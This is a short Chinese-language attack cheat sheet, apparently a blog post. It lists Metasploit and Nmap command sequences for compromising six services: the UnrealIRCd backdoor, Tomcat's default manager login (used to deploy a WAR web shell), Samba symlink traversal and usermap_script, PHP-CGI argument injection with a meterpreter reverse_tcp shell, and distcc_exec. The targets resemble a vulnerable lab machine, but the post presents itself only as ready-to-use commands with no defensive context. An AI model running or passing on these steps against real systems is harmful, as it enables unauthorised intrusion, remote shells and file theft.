废话不多说直接上图帖命令?
- Metasploit溢出UnrealIRCd后门漏洞(unrealircd 6667)
-
- Nmap -sV x.x.x.x //扫描端口,状态,服务,版本号
- search unreal ircd
- 选择 use exploit/unix/irc/unreal_ircd_3281_backdoor
- Show options 设置 rhost
- Exploit
- Metasploit溢出Tomcat管理台默认口令漏洞(http 8180 apache tomcat/coyote jsp)
-
- Nmap-sV x.x.x //扫描端口,状态,服务,版本号
- 网页进入x.x.x:8180
- 进入管理页面(tomcat manager)
- Name:tomcat password:tomcat
- 点击browse 上传war包 然后按Deploy
- 输入http://x.x.x.x:8180/hacker/index.jsp 密码“87966550”
- Metasploit溢出sysmlink默认配置目录遍历漏洞(samba 139 445)
-
- Nmap-sV x.x.x //扫描端口,状态,服务,版本号
- Search samba(选择use auxiliary/admin/smb/samba_symlink_traversal)
- Info set rhost
- Set smbshare tmp //设置SAM可写文件
- Expliot
- 终端输入 smbclient //x.x.x.x/tmp //回车 不需要密码
- cd rootfs ls(more /etc/passwd)
- Metasploit溢出samba提权漏洞(samba 139 445)
-
- Nmap-sV x.x.x //扫描端口,状态,服务,版本号
- Search samba(选择 use exploit/multi/samba/usermap_script)
- Info set rhost
- Exploit
- Metasploit溢出phpMyAdmin漏洞(http 80)
-
- Nmap-sV x.x.x //扫描端口,状态,服务,版本号
- 看到开启的80端口 进入 “http://x.x.x.x”
- 用dirbuster扫描目标主机
- 选择字典 在/usr/share/dirbuster/wordlists
- 扫描结果显示包含cgi-bin目录,phpmyadmin目录
- Search php_cgi
- Use exploit/multi/http/php_cgi_arg_injection
- Show payloads
- set payloads php/meterpreter/reverse_tcp
- Set lhost set rhost exploit
- Sysinfo ls cat phpinfo.php
- Metasploit溢出Distcc后门漏洞(distcc 3632)
-
- Nmap-sV x.x.x //扫描端口,状态,服务,版本号
- Search distcc_exec
- Use exploit/unix/misc/distcc_exec
- Show options set rhost exploit
- Id ifconfig whoami